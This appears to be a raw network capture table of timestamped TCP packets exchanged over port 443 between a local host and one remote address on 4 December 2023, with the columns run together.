                                                                                                                              Dec 4, 2023 15:22:04.464884043 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.465157032 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.465221882 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.465425968 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.470195055 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.470432043 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.470484972 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.470742941 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.473915100 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.474167109 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.474220037 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.474479914 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.477370977 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.477621078 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.477678061 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.477894068 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.480731010 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.480995893 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.482435942 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.482671022 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.482723951 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.482958078 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.486192942 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.486498117 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.486551046 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.486815929 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.489316940 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.489573956 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.489629030 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.489905119 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.492762089 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.493046045 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.493099928 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.493370056 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.496201992 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.496463060 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.496517897 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.496829033 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.499717951 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.499962091 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.500015974 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.500247955 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.503102064 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.503351927 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.503412008 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.503652096 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.506613016 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.506870985 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.506927013 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.507169962 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.510057926 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.510298014 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.510353088 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.510590076 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.513645887 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.513900995 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.513958931 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.514193058 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.516921043 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.517196894 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.517250061 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.517522097 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.520467043 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.520737886 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.520792007 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.520996094 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.523907900 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.524142027 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.525671005 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.525932074 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.525986910 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.526222944 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.529166937 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.529417992 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.529478073 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.529706001 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.532525063 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.532777071 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.532833099 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.533068895 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.535972118 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.536222935 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.536278009 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.536516905 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.539375067 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.539627075 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.539685011 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.539943933 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.542861938 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.543112040 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.543169022 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.543472052 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.546226978 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.546469927 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.546525002 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.546777010 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.549418926 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.549712896 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.549782991 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.550036907 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.552608013 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.552864075 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.552922010 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.553148985 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.556103945 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.556312084 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.556387901 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.556595087 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.558965921 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.559230089 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.559283972 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.559516907 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.562117100 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.562413931 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.562468052 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.562716007 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.565126896 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.565368891 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.566792011 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.567017078 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.567063093 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.567295074 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.569704056 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.569907904 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.569955111 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.570216894 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.572720051 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.573003054 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.573072910 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.573313951 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.574826956 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.575016022 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.575076103 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.575324059 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.575380087 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.575597048 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.577013016 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.577214956 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.577263117 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.577496052 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.579304934 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.579508066 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.579555988 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.579840899 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.581302881 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.581579924 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.581634045 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.581870079 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.583399057 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.583601952 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.583647966 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.583877087 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.585257053 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.585536003 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.585593939 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.585860014 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.587217093 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.587485075 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.587538004 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.587779045 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.589112997 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.589386940 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.589442968 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.589669943 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.591023922 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.591279984 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.591334105 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.591526985 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.592926979 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.593173027 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.593853951 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.594118118 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.594171047 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.594428062 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.595633030 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.595905066 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.595957994 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.596168041 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.597449064 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.597651958 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.597686052 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.597910881 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.599281073 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.599565029 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.599601030 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.599828005 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.600879908 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.601033926 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.601063967 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.601300001 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.602761984 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.602994919 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.603029013 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.603214979 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.604264975 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.604463100 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.604491949 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.604671001 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.606004000 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.606229067 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.606262922 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.606539965 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.607660055 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.607846975 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.607882023 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.608059883 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.609364033 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.609559059 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.609592915 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.609818935 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.611270905 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.611432076 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.611462116 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.611675978 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.612556934 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.612720966 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.612750053 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.612988949 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.614171982 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.614367008 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.615329981 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.615525961 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.615560055 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.615768909 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.617151022 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.617330074 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.617388010 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.617603064 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.618340015 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.618514061 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.618561983 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.618777037 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.620071888 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.620239973 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.620282888 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.620428085 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.621426105 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.621594906 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.621644974 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.621845961 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.623552084 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.623753071 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.623812914 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.623965025 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.624012947 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.624224901 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.624341965 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.624517918 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.624582052 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.624838114 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.625725985 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.625909090 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.625951052 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.626108885 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.627311945 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.627481937 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.627525091 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.627746105 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.628861904 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.629030943 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.629079103 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.629312992 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.630388975 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.630683899 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.630738020 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.631010056 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.631970882 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.632138014 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.632200003 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.632352114 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.632388115 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.632592916 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.633130074 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.633348942 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.633991957 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.634165049 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.634211063 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.634411097 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.635358095 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.635633945 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.635688066 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.635929108 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.636862040 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.637039900 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.637085915 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.637295008 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.638309002 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.638484955 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.638530970 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.638789892 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.639838934 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.640168905 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.640223026 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.640410900 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.641079903 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.641251087 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.641310930 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.641525984 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.641582966 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.641839027 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.642486095 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.642654896 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.642704964 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.642884016 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.643784046 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.643953085 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.643996954 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.644136906 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.645163059 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.645330906 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.645373106 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.645571947 CET50130443192.168.11.20142.251.41.1
